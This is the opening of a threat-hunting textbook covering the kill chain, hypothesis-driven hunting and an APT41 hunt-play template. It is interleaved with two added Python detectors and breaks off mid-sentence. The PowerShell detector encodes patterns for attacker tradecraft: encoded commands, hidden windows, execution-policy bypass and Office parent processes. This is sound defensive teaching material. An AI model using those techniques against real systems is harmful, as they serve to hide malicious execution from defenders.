Cyber Threat Hunting MEAP V05

1. Copyright 2023 Manning Publications
2. Welcome
3. 1 Introduction to Threat Hunting
4. 2 Building the Foundation of a Threat Hunting Practice
5. 3 Your First Threat Hunting Expedition
6. 4 Threat Intelligence for Threat Hunting
7. 5 Hunting in Clouds
8. 6 Using Fundamental Statistical Constructs
9. 7 Tuning Statistical Logic
10. 8 Unsupervised Machine Learning with K-Means

MEAP Edition Manning Early Access Program Cyber Threat Hunting
Version 5

Copyright 2023 Manning Publications


©Manning Publications Co. We welcome reader comments about anything in
the manuscript - other than typos and other simple mistakes. These will be
cleaned up during production of the book by copyeditors and proofreaders.
https://livebook.manning.com/#!/book/cyber-threat-hunting/discussion

For more information on this and other Manning titles go to manning.com


welcome
Thanks for purchasing the MEAP of Cyber Threat Hunting. The book takes
you through a journey to become a successful threat hunter. In this book, I
share my experience of threat hunting to help you establish a practical threat
hunting framework, understand the mindset of threat hunters, and live the
hunting experience by conducting real-life threat hunt expeditions.

Throughout the book, we will be covering various data sources, data sets, and
techniques to design and conduct threat hunting. We show how hunters can
use standard searches, statistics, and machine learning as analytic techniques
to conduct threat hunt expeditions.

I first take you through the fundamentals of threat hunting, how to build a
practical threat hunting framework, and how to establish a maturity roadmap
for your threat hunting program.

I then take you through the process of conducting threat hunt expeditions
using a scenario-based approach, covering different real-life topics and
scenarios. You will get the opportunity to learn and practice threat hunting
using different data sets and techniques. You will gain access to templates
and processes that I hope will be of value to your career and inspiration as a
threat hunter.

To get the best out of the book, you need to have basic knowledge and
experience in managing security controls, networking concepts, operating
systems, and performing searches in data stores.

Please let me know your thoughts in the liveBook discussion forum on what I
wrote so far and what you would like to see in the rest of the book.

Thanks again for your interest and for purchasing the MEAP. Good luck,
hunters!

Nadhem Al Fardan
1 Introduction to Threat Hunting
The chapter introduces the Cyber Kill Chain and provides an overview of the
cyber security threat landscape and how threat hunting can tackle complex
cyber security challenges. The chapter describes the thought process behind
threat hunting, laying down fundamental concepts of a successful threat
hunting practice. The chapter draws the differences and highlights the
similarities between threat hunting and threat detection. The chapter ends
with an overview of the core tools that threat hunters use.

The book defines cyber threat hunting as follows:

Definition

Cyber threat hunting is a human-centric security practice that takes a
proactive approach to uncover threats that evaded detection tools or threats
that have been detected but dismissed or undermined by humans.

The chapter covers the following topics:

- The stages of the Cyber Kill Chain
- How threat hunters, equipped with the right skill set and tools, uncover
  cyber threats that went unnoticed by detection tools
- The similarities and differences between cyber threat hunters and
  farmers (security analysts), and how hunting and detection services
  complement each other
- The hypothesis-driven approach that the threat hunting process takes
- The characteristics of a successful threat hunter and a threat hunting
  practice
- The set of core tools that threat hunters require to conduct hunting
  expeditions

Let us start with an overview of the cybersecurity threat landscape and show
why threat hunting is essential.
1.1 Cybersecurity Threat Landscape
Today's cyber threat landscape is complex, constantly evolving, and diverse.
Threat actors, ranging from organized cybercrime to state-sponsored groups,
actively improve existing attack techniques and tools and create new ones to
reliably establish and quickly move through the Cyber Kill Chain
(https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html),
starting from reconnaissance to actions on objectives.

The Cyber Kill Chain developed by Lockheed Martin, shown in Figure 1.1,
describes the set of stages that adversaries typically go through to achieve
their final objective(s). The Cyber Kill Chain consists of seven stages.

1. Reconnaissance: the attacker assesses the situation to identify potential
   attack targets and tactics. For example, an attacker harvests social media
   accounts or performs an active vulnerability scan on publicly accessible
   applications.
2. Weaponization: the attacker develops the code to exploit vulnerabilities
   or weaknesses that the reconnaissance stage uncovered. For example,
   preparing a phishing email, formulating SQL injection code, or
   preparing malware code.
3. Delivery: the attacker uses delivery vectors to send the weaponized
   payload. For example, an attacker uses email to deliver malware code.
4. Exploitation: the attacker executes the code she created in the
   weaponization stage.
5. Installation: the attacker creates a channel that allows her to reach the
   compromised system.
6. Command and Control: the attacker establishes a command-and-control
   channel (C2) with an external server. For example, an attacker uses
   Twitter as a covert command and control channel to communicate with
   compromised systems.
7. Actions on Objectives: the attacker fulfills the objective(s) of the
   attack. For example, an attacker encrypts files on the endpoint in the
   case of a ransomware attack.

Figure 1.1 Lockheed Martin Cyber Kill Chain


A popular meme in cyber security, credited to Dmitri Alperovitch, states,
"there are only two types of companies: those that know they've been
compromised, and those that don't know." Threat hunting allows
organizations to take a proactive approach in which they assume that they
have been hacked and can uncover evidence of that.

We now have some idea about the complexity of the security threat
landscape; let us dig into essential concepts of threat hunting and describe its
relevance and importance.

1.2 Why Hunt?


There is no perfect cybercrime. Adversaries leave clues and a trail of
evidence when executing one or more of the Cyber Kill Chain stages.

Advanced adversaries have shifted from using noisy attacks that trigger
security alarms to stealthier ones that leave a small footprint and trigger
minimal alerts, if any, going unnoticed by automated detection tools.
According to a SANS published report
(https://www.sans.org/webcasts/stop-nasty-malware-pre-post-execution-review-ensilo-endpoint-security-platform-106690),
"the evolution of threats such as file-less malware, ransomware, zero days
and advanced malware, combined with security tools getting bypassed, poses
an existential risk to enterprises."

Threat actors' increased sophistication in operating covertly, and their
ability to launch attacks with minimal chances of detection, are driving
organizations to think beyond their standard detection tools. The change in
adversary behavior requires defenders to establish proactive capabilities
such as threat hunting and to deploy advanced analytics using statistics and
machine learning. For example, hunters can regularly search for potential
data exfiltration activities through the Domain Name System (DNS) by applying
volume-based statistical analytics, without waiting for or relying on network
security tools such as intrusion detection systems to generate security alerts.
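The volume-based DNS analytics just mentioned, as an added example that is not code from the book: it parses a constructed resolver log (the line format "<timestamp> <client> <query name> <type>" is an assumption), builds per-client query volume and distinct-name counts, and flags clients whose values are statistical outliers relative to the other clients. The log lines, client addresses and zone names are all constructed for the example.

```python
"""Volume-based hunt for unusual DNS activity per client (added example)."""
import re
import statistics
from collections import Counter, defaultdict

# Assumed log format: "<timestamp> <client_ip> <query_name> <qtype>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")


def build_sample_log():
    """Constructed resolver log: five ordinary clients plus one client that
    issues hundreds of queries for unique names under a single zone."""
    names = ["www.example.com", "mail.example.com", "cdn.example.net", "api.example.org"]
    lines = []
    for i, client in enumerate(["10.0.0.11", "10.0.0.12", "10.0.0.13", "10.0.0.14", "10.0.0.15"]):
        for n in range(40):
            lines.append(f"2023-05-01T10:{n:02d}:00 {client} {names[(n + i) % len(names)]} A")
    for n in range(400):
        lines.append(f"2023-05-01T10:{n % 60:02d}:{n % 60:02d} 10.0.0.50 h{n:04x}.upd.cdn-sync.test TXT")
    lines.append("garbage line that does not parse")  # malformed input must not abort the hunt
    return lines


def parse_dns_log(lines):
    """Parse log lines into dicts; malformed lines are skipped, not fatal."""
    records = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def client_features(records):
    """Per-client volume features: total queries and number of distinct names."""
    counts = Counter()
    names = defaultdict(set)
    for r in records:
        counts[r["client"]] += 1
        names[r["client"]].add(r["qname"].lower())
    return {c: {"queries": counts[c], "distinct_names": len(names[c])} for c in counts}


def flag_outliers(features, metric, z_threshold=2.0):
    """Clients whose metric lies more than z_threshold population standard
    deviations above the mean. Needs at least three clients and non-zero spread."""
    values = [f[metric] for f in features.values()]
    if len(values) < 3:
        return []
    mean = statistics.mean(values)
    spread = statistics.pstdev(values)
    if spread == 0:
        return []
    return sorted(c for c, f in features.items() if (f[metric] - mean) / spread > z_threshold)


def run_hunt(lines):
    """Full pass: parse, build per-client features, flag outliers on each metric."""
    features = client_features(parse_dns_log(lines))
    return {metric: flag_outliers(features, metric) for metric in ("queries", "distinct_names")}


if __name__ == "__main__":
    for metric, clients in run_hunt(build_sample_log()).items():
        print(f"{metric}: {clients}")
```

With only six clients in the sample, the largest z-score a single outlier can reach is about 2.24, which is why the threshold is 2.0 here. Against a real resolver log the hunter would baseline each client against its own history over days rather than against a handful of peers, and would triage a flagged client rather than treat the score itself as a finding.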

Organizations rely on the threat hunter's skills to uncover the above threats
during threat hunt expeditions, resulting in reduced dwell time and increased
cyber resilience. The dwell time is the time between an attacker's initial
penetration of an organization's environment (the threat's first successful
execution time) and the point at which the organization detects the attacker
(threat detection time).

In addition to reducing the dwell time, running threat hunting expeditions
introduces other security benefits to the organization, such as:

- Identifying gaps in security prevention and detection capabilities
- Tuning existing security monitoring use cases
- Identifying new security monitoring use cases
- Identifying vulnerabilities that assessment activities did not uncover
- Identifying misconfigurations in systems and applications, which might
  impact security, operation, and compliance

To capture the above list of benefits, organizations need to establish and
operate a robust threat hunting process that clearly describes the threat
hunting expeditions' inputs and outputs. The book helps you establish a
robust threat hunting program using practical examples and providing
templates.

Now that we have established the need for a proactive approach to uncover
cyber security threats, let us describe how to structure a threat hunt.

1.3 Structuring Threat Hunting


Threat hunting takes a hypothesis-driven investigation approach. A
hypothesis is a proposition that is consistent with known data but has been
neither verified nor shown to be false. A good hypothesis should be relevant
to the organization environment and testable in terms of the availability of
data and tools. Taking a hypothesis-based approach is referred to as
structured threat hunting.

On the other hand, unstructured threat hunting refers to activities in which
hunters analyze data at their disposal to search for anomalies without a
pre-defined hypothesis. For example, the hunter might process and visualize
data to look for unexpected changes in patterns such as noticeable spikes or
dips. Finding such changes can lead the hunter to investigate further to
uncover undetected threats. In this book, we focus on structured threat
hunting, but we do not discourage you from exploring data without a formal
hypothesis from time to time.

The following is an example of a threat hunt hypothesis:

Hypothesis

An adversary has gained access to one or more of the organization's
Microsoft Windows endpoints. PowerShell is one of the tools used by the
adversary to perform unauthorized activities.

Now that we understand what a hypothesis is, let us discuss how to come up
with one.

1.3.1 Coming up with a Hypothesis

The threat landscape associated with the environment you try to protect
should drive what hypothesis to create and execute. Different sources
concerning threats and their relevance to the environment can assist you in
understanding the threat landscape. Threat hunters translate this
understanding to hypotheses. The following are examples of such sources:

- Internal and external threat intelligence sources
- The results of threat modeling exercises
- The results of red team exercises
- Reviewing existing threat standards and frameworks such as MITRE
  ATT&CK®
- Analysis of previous or current security incidents

1.3.2 Testing the Hypothesis

It is the job of the threat hunter to test the hypothesis using the best resources
available at the hunter's disposal. Testing the hypothesis can start by defining
a manageable list of activities that can uncover the first set of evidence or
indicators concerning the hypothesis or guide the hunters to subsequent
searches. For example, the following activities are relevant to the previously
stated hypothesis.

Hunting for suspicious PowerShell activities could reveal the existence of the
compromise, proving the hypothesis. The successful execution of the
following may uncover evidence of compromise:

1. Suspicious encoded PowerShell command
2. Suspicious execution of unsigned PowerShell scripts without warning
3. A process with suspicious PowerShell arguments
4. Suspicious PowerShell parent process
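One way to run the first, third and fourth of these activities over process-creation telemetry, as an added example that is not code from the book: each event is checked for an encoded command (which is decoded, since PowerShell's -EncodedCommand carries base64 over UTF-16LE text), for hidden-window or execution-policy-bypass arguments, and for a parent process drawn from a list of applications that should rarely spawn PowerShell. The event records, the parent-process list and the argument patterns are assumptions made for this example, not content from the book; the second activity (unsigned scripts running without a warning) is not covered, because a command line alone does not reveal a script's signature state.

```python
"""Hunt for suspicious PowerShell launches in process-creation events (added example)."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (assumed fields, modelled on Sysmon event ID 1)."""
    host: str
    image: str          # full path of the started process
    parent_image: str   # full path of the parent process
    command_line: str


# Assumed indicator lists for this hunt (not from the book).
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "mshta.exe", "wscript.exe", "cscript.exe"}
# -e, -ec, -en, -enc and -encodedcommand all select an encoded command.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)


def basename(path):
    """Last path component (Windows or POSIX separators), lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 over UTF-16LE text; return None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def inspect_event(event):
    """Return (reasons, decoded_command); an empty reasons list means nothing found."""
    reasons, decoded = [], None
    if basename(event.image) not in POWERSHELL_IMAGES:
        return reasons, decoded
    cmd = event.command_line
    m = ENCODED_RE.search(cmd)
    if m:
        decoded = decode_encoded_command(m.group(1))
        reasons.append("encoded command" if decoded is not None
                       else "encoded command (not decodable)")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if BYPASS_RE.search(cmd):
        reasons.append("execution policy bypass")
    parent = basename(event.parent_image)
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"suspicious parent: {parent}")
    return reasons, decoded


def hunt_powershell(events):
    """Apply the checks to every event and keep the ones with at least one reason."""
    findings = []
    for ev in events:
        reasons, decoded = inspect_event(ev)
        if reasons:
            findings.append({"host": ev.host, "command_line": ev.command_line,
                             "reasons": reasons, "decoded": decoded})
    return findings


def encode_ps(text):
    """Build an -EncodedCommand value the way PowerShell expects (used for sample data)."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
BENIGN_ENCODED = encode_ps("Write-Output 'hunt'")  # harmless payload for the sample
SAMPLE_EVENTS = [  # constructed events, not real telemetry
    ProcEvent("ws-01", PS, r"C:\Windows\explorer.exe",
              "powershell.exe -NoProfile -Command Get-Service"),
    ProcEvent("ws-02", PS, WORD, f"powershell.exe -w hidden -enc {BENIGN_ENCODED}"),
    ProcEvent("ws-03", PS, r"C:\Windows\System32\cmd.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcEvent("ws-04", PS, r"C:\Windows\System32\mshta.exe",
              'powershell.exe -nop -w hidden -c "Get-Date"'),
    ProcEvent("ws-05", PS, r"C:\Windows\System32\cmd.exe", "powershell.exe -enc notbase64"),
    ProcEvent("ws-06", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for f in hunt_powershell(SAMPLE_EVENTS):
        print(f["host"], f["reasons"], f["decoded"])
```

Each finding keeps the decoded command so the hunter can read what actually ran instead of triaging a base64 blob, and the execution-policy hit on ws-03 is a deliberate reminder that a single reason is a lead to pivot on (who scheduled backup.ps1, is it signed, does it run elsewhere), not proof of the hypothesis.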

When conducting a hunt, there are three possible outcomes:

1. Hypothesis proven: the analysis of the data collected during the hunt
expedition confirms the correctness of the hypothesis. In this case, the
hunt expedition uncovered a security incident.
2. Hypothesis disproven: the analysis of the data collected during the hunt
expedition confirms the incorrectness of the hypothesis. In this case, the
hunt expedition could not uncover a security incident.
3. Inconclusive: there is still insufficient information to either prove or
disprove the hypothesis. This outcome could be due to various reasons
such as insufficient data, inappropriate tools, and scope limitations.

1.3.3 Executing the Threat Hunt


Executing a threat hunt might take an hour or might go on for a week,
depending on several factors such as:

1. Initial suspicious activities: the number of initial use cases to execute
   in search of the first set of clues.
2. Data: the amount of data to search in, the complexity of the search, and
   the tools' performance. For example, running a search against 1TB of
   data on hot storage (disks with high input/output operations per second)
   would be much faster than running the exact search on cold storage
   (disks with low input/output operations per second).
3. Threat complexity: sophisticated attacks might be associated with the
   likes of Advanced Persistent Threats (APTs), which in many cases take
   weeks or even months to investigate thoroughly. This is not to say that
   the hunt will last for months, but that the hunt part would take longer
   than average.
4. Access to data and systems: not gaining timely access to systems or
   data in the middle of a hunt expedition can prolong the hunt duration.
   For example, not providing the hunter timely access to the network flows
   maintained by a different team would waste time and force the hunter to
   wait, find more expensive and less reliable options, or end with an
   inconclusive hunt outcome.

Failing to prove the hypothesis does not necessarily mean that the threat does
not exist. It means that the hunter could not uncover the threat with the
skillset, data, and tools available.

The book focuses on structured threat hunting, in which the threat hunter
works with other security team members to define and prove a hypothesis
targeting adversaries' Tactics, Techniques, and Procedures (TTPs).

The organization's threat hunting maturity level should improve over time.
There are many lessons the hunter will learn from the hunt expeditions. The
book provides practical lessons on how to plan, build and operate an effective
threat hunting program.

Now that we have a good idea about threat hunting, let us compare it with
threat detection, a fundamental security monitoring service, and draw
differences and highlight similarities.

1.4 Threat Hunting vs Threat Detection


Detection is tool-driven, while hunting is human-driven. In hunting, the
hunter takes center stage, compared to tools having that role in the world of
detection. Threat hunting relies heavily on the experience of the threat hunter
for defining the hypothesis, looking for evidence in a vast amount of data,
and continuously pivoting in search of the evidence of compromise. Threat
hunting does not replace threat detection technologies; they are
complementary.

Threat detection refers to the reactive approach in which Security Operations
Center (SOC) analysts respond to security alerts generated by tools. For
example, SOC analysts would triage and investigate a security event
generated by an Endpoint Detection and Response (EDR) tool or a security
alert generated by a Security Information and Event Management (SIEM)
system.

SOC analysts attend to security alerts detected and reported by security tools
and perform triage and investigation of security incidents. Figure 1.2 shows
at a high level the threat detection process, in which SOC analysts would
primarily perform cyber threat farming. Like farmers, SOC analysts generally
wait for alerts (ripe crops) to show up on a dashboard to triage and respond to
(harvest and process). On the other hand, hunting takes a proactive approach.
Hunters take the lead by going out in the hunting field to conduct
expeditions, equipped with the right mindset, experience, situational
awareness, and the set of tools they require for an expedition.

Figure 1.2 Threat Detection High-Level Process

Detection is an essential SOC service. Addressing deficiencies in the security
monitoring service should be a top priority while establishing or outsourcing
a threat hunting capability. Organizations should not consider establishing a
threat hunting program to offload the work from the security monitoring team
to threat hunters.

Detection and hunting should work together to deliver better coverage of
the cyber threat landscape. Detection and hunting interact and, in some
instances, overlap. There will always be cases where detection is an input to a
threat hunt and vice versa. For example, a threat hunter might build a
hypothesis that considers a widespread system compromise based on a few
suspicious activities detected on one or more endpoints and observed by the
security monitoring team.

Detection and hunting can use the same or different analytic techniques to
detect or hunt for malicious activities. For example, user behavior analytic
tools deploy statistical analysis and machine learning to detect and report
anomalous user behavior to the security monitoring team. Hunters can make
use of similar techniques for cyber threat hunting. Although hunters would
not lead the development of machine learning models, they must understand
the capabilities and limitations of the different analytic techniques.

Threat hunters are highly skilled resources. Let us have a look at the set of
skills that threat hunters possess.

1.5 The Background of a Threat Hunter


A threat hunter is a cyber security specialist who proactively and interactively
seeks to uncover attacks or threats that evaded detection technologies
deployed in various places in the network.

Successful threat hunters are curious, prepared to tackle new challenges, and
equipped with a good understanding of their hunting field. As a threat hunter,
you will face challenges such as the unavailability of data, slow searches,
improper event parsing, old technologies, and incomplete or no access to
systems. The hunter should raise these challenges during and after a hunt
expedition. Some of these challenges might get addressed in a reasonable time,
while others might take a long time or might not get addressed at all,
especially ones that involve financial investments. These challenges should
not prevent hunters from finding new ways to enhance the effectiveness of
threat hunts by looking at other data and systems and tuning the techniques
they deploy. Hunters are resourceful.

An offensive mindset gives the hunter an advantage in creating effective
threat hunt plays and executing threat hunt expeditions.

During a hunt expedition, not being able to prove the hypothesis should not
discourage a hunter. It is a common outcome that can be due to various
reasons, including:

- The attack or the threat described in the hypothesis does not exist in the
  first place.
- The hunter might not yet have the full context about the environment.
  For example, running a threat hunt against a newly deployed set of
  systems and applications might prove challenging.
- The hunter might not yet have the skill set required to uncover
  sophisticated attacks against technologies that the hunter is not very
  familiar with. For example, running a threat hunt expedition against a
  private Kubernetes environment while the hunter is unfamiliar with
  containerized deployments.
- Lack of the data the hunter requires to perform better investigations.
- The use of inappropriate techniques to uncover sophisticated attacks.
  For example, running basic searches to uncover advanced persistent
  threats (APTs) has its limitations.

As a threat hunter, you cannot be expected to know everything. Successful
threat hunters spend an ample amount of time on research and, in many cases,
try new Tactics, Techniques, and Procedures (TTPs). Cyber security is a
dynamic landscape, and having valuable research time enhances the chances
of uncovering advanced TTPs.

As a threat hunter, understanding the threat hunting process is essential. Let
us take a look at the threat hunting process.

1.6 Threat Hunting Process
Defining a process helps threat hunters establish, conduct, and continuously
improve the overall threat hunting practice and the individual threat hunt
plays, increasing, over time, the probability of uncovering threats. Not only
does it help improve the quality of threat hunts, but the process also
incorporates other values that threat hunting introduces to the organization,
such as updating existing or developing new detection and threat intelligence
content.

Figure 1.3 shows at a high level the threat hunting process, which starts by
formalizing a hypothesis, followed by trying to prove the hypothesis. If the
hunter could not prove the hypothesis, the hunter tries to improve it by
updating the hypothesis details and searching again for the threat. If proven,
the threat has been uncovered. The hunter does not stop there, but expands
the scope and searches for indicators on other systems to understand the
attack's magnitude and spread. The hunter would then engage the incident
response team and document and share new content that would be helpful to
the security monitoring and threat intelligence teams.

Figure 1.3 Threat Hunting High-Level Process


The following are the threat hunting process steps:

- Formulate a hypothesis: define the hypothesis based on inputs collected
  from sources and activities such as threat modeling outcomes, TTPs
  received from internal and external threat intelligence providers, or
  simply searching for tactics and techniques described in standard
  frameworks such as MITRE ATT&CK®. For example, the organization's
  threat intelligence team might track adversary groups such as APT 29
  (https://www.fireeye.com/current-threats/apt-groups.html), targeting
  Western European governments, foreign policy groups, and similar
  organizations. The hunter can formulate hypotheses based on relevant
  tactics and techniques deployed by the group. Before moving into the
  next step, the hunter needs to answer the following questions:
  - What activities does the threat hunter need to look for to prove the
    hypothesis?
  - What data does the threat hunter need to access?
  - How big is the data?
  - How much time will the searches take? How can the threat hunter,
    with the help of platform specialists, optimize the searches?
  - What tools should the threat hunter use?
- Look for it in the environment: search for indicators and evidence that
  can prove the hypothesis.
- If not proven, optimize and go back: optimize the threat hunt by
  increasing the scope of the hunt, requesting further access to data or
  systems, updating the search activities, or updating the hypothesis itself.
- If proven, pivot and expand the scope: the hypothesis is proven. The
  hunter researches the extent of the security incident by expanding the
  scope of the hunt.
- Improve existing or develop new detection and threat intelligence
  content: now that the hypothesis is proven, the threat hunter may
  recommend new security monitoring detection rules and update the
  threat intelligence content by sharing indicators or TTPs.
- Engage the incident response team: now that the hypothesis is proven,
  raise a ticket and assign it to the team that handles the incident response.
  Depending on the complexity of the incident, the hunter would provide
  support to the incident handling team.

Note

In Chapter 2, we present and describe a detailed version of the hunting
process.

Note

It is important to note that although structured hunting involves following an
initial lead or clue, hunters should expect many pivots and side quests.

Now that we understand the threat hunting process let us examine the tools
used to execute the "look for threat in the environment" step.

1.7 Overview of Technologies and Tools

Although threat hunting is human-centric, having access to relevant and
reliable technologies and scalable and flexible tools is critical to the success
of the threat hunter. Events and activities can be collected from endpoints and
network elements and forwarded to data stores to be accessed and searched.
Alternatively, the hunter might require access to artifacts and events directly
from data sources to perform search and investigation activities.

Core technologies and tools that hunters would have in their toolset:

- Endpoint activities on servers and clients: access to process
  executions, network ports, registry details (in Windows), and system
  access events is a standard requirement for most hunts, whether for
  initial use cases or during a hunt. OSQuery is an example of a tool that
  provides threat hunters with access to various endpoint telemetry data.
  The tool allows the hunter to write Structured Query Language (SQL)
  queries to explore operating system data. Some of the open-source and
  commercial EDR tools have similar built-in capabilities.
- Datastores: a place that provides long-term event storage and searches.
  For example, it is common to send events collected from different
  sources in the network to a data store such as Splunk or Elasticsearch,
  which is available to the security monitoring team and threat hunters.
- Analytics: facilitates scalable searches with tools such as Splunk or
  Elasticsearch, or advanced functions such as statistics and machine
  learning with platforms such as Apache Spark.

Depending on the environment and the scope of the hunt, the hunter’s toolset
would contain other tools. For example, a hunter might use YARA rules to
research and capture suspicious activities on endpoints or push snort rules to
network security tools such as intrusion detection systems to capture network
activities of interest.

The book describes and provides examples of different open-source and
commercial tools that threat hunters use and how to utilize the tools to
conduct threat hunts.

1.8 Summary
Structured threat hunting is a hypothesis-driven practice that proactively tries
to uncover threats that were not detected or threats that have been detected
but dismissed or undermined by humans. Understanding the mindset of a
threat hunter and the threat hunting process is crucial to becoming a
successful threat hunter.
2 Building the Foundation of a Threat Hunting Practice

This chapter covers

- How to develop a threat hunting hypothesis
- How to document a threat hunt play
- The importance of threat intelligence to threat hunting
- Building a threat hunting framework
- The detail of the threat hunting process
- Threat hunting roles and responsibilities
- Important frameworks and standards
- How to evaluate the maturity of a threat hunting practice

In Chapter 1, we established foundational threat hunting concepts. In this
chapter, we discuss how to create a threat hunting framework. We start with
an overview of existing frameworks and standards and how and where they
cover the topic of threat hunting. For example, we discuss how and where a
standard like NIST Special Publication 800-53 Rev 5 covers threat hunting
and how a framework like MITRE ATT&CK can be used to establish hunts
based on threat tactics, techniques and procedures.

We then describe how to start a hunting practice and improve its maturity
over time, supplying you with processes and templates to kickstart the work.
We then describe the general role and responsibilities of the threat hunter
using a responsible, accountable, consulted, and informed model.

Finally, we describe data sources and their importance to threat hunting and
provide an overview of common data sources and sets such as Windows
events, Sysmon, Linux events, network flows and firewall events.

Let us start by defining essential concepts and roles that we would refer to in
this chapter and the rest of the book.
2.1 Threat Hunting Definitions

- Threat hunting is a human-centric security practice that takes a
  proactive approach to uncover threats that evaded detection tools such as
  automated, rule- and signature-based security systems, or threats that
  have been detected but dismissed or undermined by humans.
- A hypothesis is a proposition that is consistent with known data but has
  been neither verified nor shown to be false.
- A threat hunter is a role taken by a cyber security specialist who
  proactively and interactively seeks to uncover attacks or threats that
  evaded detection technologies deployed in various places in the
  network.
- Situational awareness refers to understanding the business, the
  supporting technology environment and the internal and external cyber
  threats associated with this environment.
- A threat actor refers to a person, a group or an organization driven by
  different motives to carry out malicious intents.

Now that we have defined some essential threat hunting-related concepts and
roles, let us construct our first hunt play.

2.2 Developing a Threat Hunting Hypothesis

A hypothesis is a proposition that is consistent with known data but has been
neither verified nor shown to be false. To start a structured hunt, you should
first determine what to hunt for and what format to use to describe it, i.e.,
answer two questions: how do you come up with a reasonable hypothesis, and
how do you document a threat hunt play?

2.2.1 Threat Scenario

Imagine the threat intelligence team sharing with you that a threat group
referred to as APT41 is now a top actor in their threat watchlist. Construct a
threat hunt play to uncover this group’s activities when using shell-based
techniques against Microsoft Active Directory (AD).
Note

This scenario considers a known threat actor that the threat intelligence team
considers relevant to the environment. There will be other cases in which the
actors and campaign are unknown, and you would rely on your experience,
data, and tools to uncover them. It takes time to build maturity, so let us start
with this scenario.

2.2.2 The Threat Hunt Play

We need to create a threat hunt play, such as the example that will shortly
follow. The threat hunt play documents the following: title, reference
number, background about the organization and the hunt play, the hypothesis
that we try to test, the scope of the hunt, the techniques that we would start
with to trigger the hunt, along with the associated procedures and data
sources, and internal and external references relevant to the hunt play. Let us
look at the example.

Title: Hunt for APT41 activities in the Microsoft AD environment

Reference Number: Hunt-Play-APT41-01

Background: An organizational threat assessment identified APT41 as
a high-priority threat. The MITRE ATT&CK Navigator details several
techniques attributed to this threat actor. Several of these techniques are
relevant to the organization's Microsoft Active Directory (AD)
environment.

Hypothesis: We hypothesize that the APT41 threat actor is present in
the network and that we would detect evidence of multiple techniques
deployed in a manner consistent with the group's attack patterns.

Scope: The scope of the hunt covers the Microsoft AD servers and other
systems that make use of the Microsoft AD services.

Threat Technique: MITRE ATT&CK T1059.001: Command and Scripting
Interpreter: PowerShell
    Procedure: APT41 leveraged PowerShell to deploy malware
    families in victims' environments.
    Data sources and events: Command/Command Execution,
    Module/Module Load, Process/Process Creation (Security Auditing
    event 4688 and Sysmon event 1) and Script/Script Execution

Threat Technique: MITRE ATT&CK T1059.003: Command and Scripting
Interpreter: Windows Command Shell
    Procedure 1: APT41 used cmd.exe /c to execute commands on
    remote machines. APT41 used a batch file to install persistence for
    the Cobalt Strike BEACON loader.
    Data sources and events: Command/Command Execution, and
    Process/Process Creation (Security Auditing event 4688 and
    Sysmon event 1)

References:
    MITRE ATT&CK on APT41 (https://attack.mitre.org/groups/G0096/)
    Insikt Group. (2021, February 28). China-Linked Group RedEcho
    Targets the Indian Power Sector Amid Heightened Border
    Tensions. Retrieved March 22, 2021.
    APT41 group assessment report developed by the organization's
    threat intelligence team

Figure 2.1 Threat Hunt Play Example


Considering the threat scenario and the sample hunt play we created, let us
look at how to design, construct and document a threat hunt play.

2.2.3 Formalizing the Hunt Hypothesis

To start a structured hunt, you should first determine what to hunt for and
what format to use to describe it, i.e., answer two questions: how do you come
up with a reasonable hypothesis, and how do you document a threat hunt play?
The hypothesis is at the center of structured threat hunting. It states what
threats may be present in the network and how to identify them. The number
of hypotheses should grow over time as the threat hunter gains better
knowledge of the environment (better situational awareness), consumes
better threat intelligence that facilitates the creation of new threat
hunts, or simply as the number of applications and systems grows.

Over time, some threat hunts might transition to security detection rules. In
addition, there will also be cases in which some hunts might become
obsolete, for example, after decommissioning an application or a system.

The hunter should consider the following attributes when developing a
hypothesis:

Relevant: the hypothesis should be relevant to the environment. The
hunter should apply situational awareness and domain expertise to drive
the development and testing of a hypothesis. Situational awareness is
gained over time, adding to the threat hunter's experience and driving
better threat hunt design and execution. In our scenario, the threat hunter
should be familiar with how Microsoft AD works in general and with its
security aspects in particular (domain expertise), and with the current
deployment of Microsoft Active Directory in the environment
(situational awareness).
Testable: it should be possible to test the hypothesis using the data and
tools available to the hunter. In our scenario, the hunter needs access to
the operating system and Microsoft AD events, and to the tools that collect
and store these events, so that the hunter can at least search for them.

The following is a format that you can use to document a threat hunting play.
The format consists of the following:

Background about the threat hunt, including information about the
threat and the hunt field in scope.
A statement that describes the threat and hypothesizes that the threat exists
and that the threat hunter can uncover it.
The scope of the threat hunt, which describes the hunt field.
A list of techniques and indicators to look for to reveal the existence of
the threat actor. Select relevant techniques, combining information about
the threat actor with the threat hunter's experience and knowledge of
the environment. The threat hunter may identify corresponding MITRE
ATT&CK techniques and sub-techniques if applicable to the hypothesis.
The procedures used by the adversary to realize the techniques, which reveal
the existence of the threat actor. There could be multiple procedures
mapped to one technique.
The list of data sources and sets required to test the hypothesis based on
the techniques and procedures identified.
A reference section that lists internal or external documents, blogs and
artefacts relevant to the threat hunt play.

In our scenario, the threat intelligence team provided the threat hunter with a
